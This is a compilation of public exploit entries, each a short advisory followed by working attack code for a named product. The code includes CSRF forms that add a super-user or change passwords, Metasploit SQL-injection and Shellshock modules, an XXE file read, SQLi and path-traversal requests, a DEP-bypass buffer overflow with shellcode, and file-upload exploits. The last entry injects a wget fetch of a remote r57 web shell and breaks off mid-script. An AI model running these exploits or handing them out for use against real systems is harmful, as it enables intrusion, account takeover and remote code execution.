
-
Fortinet FortiAnalyzer - Cross-Site Request Forgery
source: https://www.securityfocus.com/bid/63663/info FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests. Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions in the context of the device running the affected application. Other attacks are also possible. Versions prior to Fortianalyzer 4.3.7 and 5.0.5 are vulnerable. <html> <body onload="CSRF.submit();"> <html> <body onload="CSRF.submit();"> <form id="csrf" action="https://www.example.com/IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog"; method="post" name="CSRF"> <input name="userId" value="user.via.cfsr"> </input> <input name="type" value="0"> </input> <input name="rserver" value=""> </input> <input name="lserver" value=""> </input> <input name="subject" value=""> </input> <input name="cacerts" value="Fortinet_CA2"> </input> <input name="password" value="123456"> </input> <input name="password_updated" value="1"> </input> <input name="confirm_pwd" value="123456"> </input> <input name="confirm_pwd_updated" value="1"> </input> <input name="host_1" value="0.0.0.0/0.0.0.0"> </input> <input name="host_2" value="255.255.255.255/255.255.255.255"> </input> <input name="host_3" value="255.255.255.255/255.255.255.255"> </input> <input name="host_4" value="255.255.255.255/255.255.255.255"> </input> <input name="host_5" value="255.255.255.255/255.255.255.255"> </input> <input name="host_6" value="255.255.255.255/255.255.255.255"> </input> <input name="host_7" value="255.255.255.255/255.255.255.255"> </input> <input name="host_8" value="255.255.255.255/255.255.255.255"> </input> <input name="host_9" value="255.255.255.255/255.255.255.255"> </input> <input name="host_10" value="255.255.255.255/255.255.255.255"> </input> <input name="host6_1" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_2" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> 
<input name="host6_3" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_4" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_5" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_6" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_7" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_8" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_9" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_10" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="profile" value="Super_User"> </input> <input name="alladomRDGrp" value="0"> </input> <input name="_adom" value=""> </input> <input name="allpackRDGrp" value="0"> </input> <input name="_adom" value=""> </input> <input name="allpackRDGrp" value="0"> </input> <input name="_pack" value=""> </input> <input name="desc" value=""> </input> <input name="showForce" value="0"> </input> <input name="numhosts" value="0"> </input> <input name="numhosts6" value="3"> </input> <input name="_comp_8" value="OK"> </input> <input name="actionevent" value="new"> </input> <input name="profileId" value=""> </input> <input name="mgt" value=""> </input> <input name="dashboard" value=""> </input> <input name="dashboardmodal" value=""> </input> <input name="csrf_token" value=""> </input> </form> </body> </html>
-
SysAid Help Desk Software 14.4.32 b25 - SQL Injection (Metasploit)
# Exploit Title: Sysaid Helpdesk Software Unauthenticated SQLi # Date: 28.11.2015 # Exploit Author: hland # Vendor Homepage: https://www.sysaid.com/ # Version: v14.4.32 b25 # Tested on: Windows 7, Windows 10 # Blog post: http://blog.blankhat.pw/2015/09/unauthenticated-sql-injection-in-sysaid.html ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' require 'msf/core/exploit/mssql_commands' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Sysaid Helpdesk Software Unauthenticated SQLi", 'Description' => %q{ This module exploits an unauthenticated SQLi vulnerability in the Sysaid Helpdesk Free software. Because the "menu" parameter is not handled correctly, a malicious user can manipulate the SQL query, and allows arbitrary code execution under the context of 'SYSTEM' because the database runs as the SA user. This module uses a Metasploit generated Powershell payload and uses xp_cmdshell, which is activated and then deactivated after exploitation. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Hland', ], 'References' => [ ['CVE', 'xxxx'], ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ ['Sysaid Helpdesk <= v14.4.32 b25', {}] ], 'Privileged' => false, 'DisclosureDate' => "Aug 29 2015", 'DefaultTarget' => 0, )) register_options( [ OptPort.new('RPORT', [true, "The web application's port", 8080]), OptString.new('TARGETURI', [true, 'The base path to to the web application', '/']) ], self.class) end def check peer = "#{rhost}:#{rport}" uri = target_uri.path uri = normalize_uri(uri,"Login.jsp") print_status("#{peer} - Checking for vulnerability") res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'vars_get' => { } }) v = res.body.scan(/\<title\>SysAid Help Desk Software\<\/title\>/) if not v vprint_error("Is this even a Sysaid Help Desk?") return Exploit::CheckCode::Safe else vprint_status("Identified system as Sysaid Help Desk") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Unknown end def mssql_xpcmdshell(cmd,doprint=false,opts={}) force_enable = false begin res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", doprint) #mssql_print_reply(res) if doprint return res rescue RuntimeError => e if(e.to_s =~ /xp_cmdshell disabled/) force_enable = true retry end raise e end end def exploit peer = "#{rhost}:#{rport}" uri = target_uri.path vprint_line("#{peer} - Getting a session token...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "Login.jsp"), 'vars_get' => { } }) vprint_line("#{peer} - Cookie's in the jar...") # Got a cookie, now ready to make exploiting requests if res && res.code == 200 #vprint_line("#{res.headers}") cookies = res.get_cookies #vprint_line("#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}") else vprint_line("No 200 response? 
I'm outta here") return end # Put together the vulnerable URI uri = normalize_uri(uri,"api","v1","menu","menu_items") # Generate powershell payload as an encoded string powershell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:encode_final_payload => true, :remove_comspec => true}) # # Inject payload and wait for shell # print_status("#{peer} - Trying to activate xp_cmdshell and exploit vulnerability") sqli = "main';exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC master..xp_cmdshell '#{powershell_payload}';--" res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'cookie' => cookies, 'vars_get' => { 'menu' => sqli, } }) # Deactivate XPCmdShell sqli = "main';exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;--" print_status("#{peer} - Deactivating xp_cmdshell to clean up after ourselves..") res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'cookie' => cookies, 'vars_get' => { 'menu' => sqli, } }) end end
-
IBM Cognos Business Intelligence - XML External Entity Information Disclosure
source: https://www.securityfocus.com/bid/63719/info IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability because its XML parser resolves external entities. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. IBM Cognos Business Intelligence 10.2.1 and prior are vulnerable. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT comments ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <ob:Openbravo xmlns:ob="http://www.example.com" xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance"> <Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L"> <id>C970393BDF6C43E2B030D23482D88EED</id> <comments>&xxe;</comments> </Product> </ob:Openbravo>
-
Nagios XI - 'tfPassword' SQL Injection
source: https://www.securityfocus.com/bid/63754/info Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Versions prior to Nagios XI 2012R2.4 are vulnerable. POST /nagiosql/index.php HTTP/1.1 Host: localhost Content-Length: 69 Origin: http://locahost User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/nagiosql/ Cookie: PHPSESSID=httj04vv2g028sbs73v9dqoqs3 tfUsername=test&tfPassword=%27%29+OR+1%3D1+limit+1%3B--+&Submit=Login
-
Limonade Framework - 'limonade.php' Local File Disclosure
source: https://www.securityfocus.com/bid/63771/info Limonade framework is prone to a local file-disclosure vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. Limonade framework 3.0 is vulnerable; other versions may also be affected. <?php /** To prevent of time out **/ set_time_limit(0); /** Error reporting **/ error_reporting(0); /** Necessary variables **/ $url = $argv[1]; $data = $argv[2]; $needle = $argv[3]; /** Curl function with appropriate adjustments **/ function CurlPost($url='localhost',$data=array()) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE); curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2); curl_setopt($ch,CURLOPT_HEADER,1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_TIMEOUT,50); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,$data); return curl_exec($ch); curl_close($ch); } list($param,$file) = explode(':',$data); $FilterBypassing = '....//'; for($i=0;$i<10;$i++) { $DataToPost[$param] = $FilterBypassing.$file; $response = CurlPost($url,$DataToPost); if(strstr($response,$needle)!==FALSE) { echo $response; echo "\n\nExploited successfully!\n"; echo 'Payload: ',$DataToPost[$param],"\n\n\n"; die(); } $FilterBypassing .= '....//'; } ?>
-
Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Information Disclosure
source: https://www.securityfocus.com/bid/63743/info Linux Kernel is prone to an information-disclosure vulnerability. An attacker can exploit this issue to obtain sensitive information like original MAC address; information obtained may aid in other attacks. Note: This BID was previously titled 'Atheros Wireless Drivers MAC Address Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected. #!/usr/bin/python import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * import random # number of times to inject probe for one bit (combat packet loss) ATTEMPTS_PER_BIT = 6 # time to wait for ACK in seconds SNIFFTIME = 0.3 def randmac(): mac = [0] * 6 for i in xrange(6): mac[i] = random.randint(0, 256) # avoid multicast/broadcast mac mac[0] = mac[0] & 0xFE return ":".join([format(byte, '02x') for byte in mac]) def parsemac(macstr): parts = macstr.replace("-", ":").split(":") if len(parts) != 6: raise ValueError("MAC does not consist of 6 parts (separated by : or -)") return [int(byte, 16) for byte in parts] def is_ack(p): return Dot11 in p and p.type == 1 and p.subtype == 13 def find_fixed_bits(s, mac): # eventually contains the real MAC address orgmac = [0] * 6 # random MAC address, used as sender, to which the target will send an ACK srcmac = randmac() # for all the bits - FIXME: Don't consider H.O. 
bit of first MAC byte for i in range(6): for bit in range(8): # flip the bit at current position currbit = mac[i] & (1 << bit) mac[i] ^= (1 << bit) # convert modified mac to string strmac = ":".join([format(byte, '02x') for byte in mac]) print "Probing", strmac, "...", replied = False for attempt in range(ATTEMPTS_PER_BIT): # inject data packet to modified MAC address packet = Dot11(type="Data", subtype=4, FCfield="from-DS", addr1=strmac, addr2=srcmac, addr3=strmac) s.send(RadioTap()/packet) # Sniff air for ACK to modified MAC l = sniff(lfilter=lambda p: is_ack(p) and p.addr1 == srcmac, count=1, timeout=SNIFFTIME, opened_socket=s) # We we got an ACK, don't need to try again if len(l) == 1: replied = True break print replied # If client replied, original bit is different from the one currently set, # otherwise it's equal to original bit. if replied: orgmac[i] |= (~currbit) & (1 << bit) else: orgmac[i] |= currbit # flip bit back to original value mac[i] ^= (1 << bit) # Done, return original MAC return orgmac if __name__ == "__main__": if len(sys.argv) != 3: print "Usage:", sys.argv[0], "interface macaddr" quit(1) try: mac = parsemac(sys.argv[2]) conf.iface = sys.argv[1] random.seed() # Open up read/write socket so we don't miss the ACK L2socket = conf.L2socket s = L2socket(type=ETH_P_ALL, iface=conf.iface) # Now find the MAC orgmac = find_fixed_bits(s, mac) s.close() print "\nReal MAC address:", ":".join(format(byte, "02x") for byte in orgmac), "\n" except ValueError, e: print "Invalid MAC address:", e except socket.error, e: print "Error with provided interface:", e
-
Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass + ROP)
#!/usr/bin/env python # # Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP) # Date: 29/11/2015 # Exploit Author: Knaps # Contact: @TheKnapsy # Website: http://blog.knapsy.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows 7 x64, but should work on any other Windows platform # # Notes: # - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/) # - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :) # - bad chars: '\x00' and '\x3b' # - max shellcode size allowed: 1260 bytes # import sys, socket, struct # ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy) # Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP. def create_rop_chain(): rop_gadgets = [ # Generate value of 201 in EAX 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xFFFFFDFF, # Value of '-201' 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] # Put EAX into EBX (other unneccessary stuff comes with this gadget as well...) 
0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] # Carry on with the ROP as generated by mona.py 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll] # Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location # used solely by the remaining part of the above gadget (it doesn't really do anything for us) 0x1001281a, # ADD ESP,4 # RETN [ImageLoad.dll] 0x61c73281, # &Writable location [sqlite3.dll] # And carry on further as generated by mona.py 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll] 0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll] 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] 0x10013ad6, # POP EBP # RETN [ImageLoad.dll] 0x61c227fa, # & push esp # ret [sqlite3.dll] 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] # Now bunch of ugly increments... unfortunately couldn't find anything nicer :( 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # 
RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x1001b4f6, # POP ECX # RETN [ImageLoad.dll] 0x61c73281, # &Writable location [sqlite3.dll] 0x100194b3, # POP EDI # RETN [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x90909090, # nop 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) # Check command line args if len(sys.argv) <= 1: print "Usage: python poc.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) # Offsets rop_offset = 2455 max_size = 5000 seh_offset = 4059 eax_offset = 4183 # move ESP out of the way so the shellcode doesn't corrupt itself during execution # metasm > add esp,-1500 shellcode = "\x81\xc4\x24\xfa\xff\xff" # Just as a PoC, spawn calc.exe. 
Replace with any other shellcode you want # (maximum size of shellcode allowed: 1260 bytes) # # msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python # Payload size: 220 bytes shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31" shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5" shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96" shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1" shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde" shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68" shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5" shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f" shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9" shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96" shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28" shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40" shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a" shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed" shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce" shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3" shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85" buffer = "A" * rop_offset # padding buffer += create_rop_chain() buffer += shellcode buffer += "A" * (seh_offset - len(buffer)) # padding buffer += "BBBB" # overwrite nSEH pointer buffer += struct.pack("<I", 0x1002280a) # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll]) buffer += "A" * (eax_offset - len(buffer)) # padding buffer += struct.pack("<I", 0xffffffff) # overwrite EAX to always trigger an exception buffer += "A" * (max_size - len(buffer)) # padding httpreq = ( "GET /changeuser.ghp HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host:" + host + ":" + str(port) + "\r\n" "Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://" + host + "/\r\n" "Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n" "Conection: Keep-Alive\r\n\r\n" ) # Send payload to the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close()
-
Thomson Reuters Velocity Analytics - Remote Code Injection
source: https://www.securityfocus.com/bid/63880/info Thomson Reuters Velocity Analytics is prone to a vulnerability that lets attackers inject and execute arbitrary code. Successfully exploiting this issue may allow an attacker to upload and execute arbitrary code with SYSTEM privileges. Thomson Reuters Velocity Analytics 6.94 build 2995 is vulnerable; other versions may also be affected. http://www.example.com/VhttpdMgr?action=importFile&fileName={BACKDOOR}
-
Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)', 'Description' => %q{ This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the 'ping.sh' CGI script, acessible through the Boa web server on Advantech switches. This module was tested against firmware version 1322_D1.98. }, 'Author' => 'hdm', 'References' => [ ['CVE', '2014-6271'], ['CWE', '94'], ['OSVDB', '112004'], ['EDB', '34765'], ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'], ['URL', 'https://access.redhat.com/articles/1200223'], ['URL', 'http://seclists.org/oss-sec/2014/q3/649'] ], 'Privileged' => false, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0A\x0D", 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl generic' } }, 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]], 'DefaultTarget' => 0, 'License' => MSF_LICENSE, 'DisclosureDate' => 'Dec 01 2015' )) register_options([ Opt::RPORT(80) ], self.class) end # # CVE-2014-6271 # def cve_2014_6271(cmd) %{() { :;}; $(#{cmd}) & } end # # Check credentials # def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh' ) if !res vprint_error("#{peer} - No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /Boa\/(.*)/ vprint_status("#{peer} - Found Boa version #{$1}") else print_status("#{peer} - Target is not a Boa web server") return Exploit::CheckCode::Safe end if res.body.to_s.index('127.0.0.1 ping 
statistics') return Exploit::CheckCode::Detected else vprint_error("#{peer} - Target does not appear to be an Advantech switch") return Expoit::CheckCode::Safe end end # # Exploit # def exploit cmd = cve_2014_6271(payload.encoded) vprint_status("#{peer} - Trying to run command '#{cmd}'") res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh', 'agent' => cmd ) end end
-
WordPress Theme Suco - 'themify-ajax.php' Arbitrary File Upload
source: https://www.securityfocus.com/bid/63836/info The Suco theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. <?php $uploadfile="devilscream.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>
-
LevelOne WBR-3406TX Router - Cross-Site Request Forgery
source: https://www.securityfocus.com/bid/63908/info LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability. Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. <html> <body> <form action="http://www.example.com/cgi-bin/pass" method="POST"> <input type="hidden" name="rc" value="@" /> <input type="hidden" name="Pa" value="1234567" /> <input type="hidden" name="P1" value="1234567" /> <input type="hidden" name="rd" value="atbox" /> <input type="submit" value="Submit form" /> </form> </body> </html>
-
PHPThumb - 'PHPThumb.php' Arbitrary File Upload
source: https://www.securityfocus.com/bid/64041/info phpThumb is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. Note: This BID was previously titled 'Joomla! Alphacontent Component 'phpThumb.php' Arbitrary File Upload Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected. #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request; $target = $ARGV[0]; if($target eq '') { print "======================================================\n"; print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n"; print "======================================================\n"; sleep(0.8); print "Usage: perl exploit.pl <target> \n"; exit(1); } if ($target !~ /http:\/\//) { $target = "http://$target"; } #print "[*] Enter the address of your hosted TXT shell (ex: ' http://c99.gen.tr/r57.txt') => "; #$shell = <STDIN>; sleep(1); print "======================================================\n"; print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n"; print "======================================================\n"; sleep(1.1); print "[*] Testing exploit ... \n"; sleep(1.1); $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1'); $shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt"; $website = "$target/components/com_alphacontent/assets/phpThumb/phpThumb.php??src=file.jpg&fltr []=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ; &phpThumbDebug=9"; $request = $agent->request(HTTP::Request->new(GET=>$website)); if ($request->is_success) { print "[+] Exploit sent with success. 
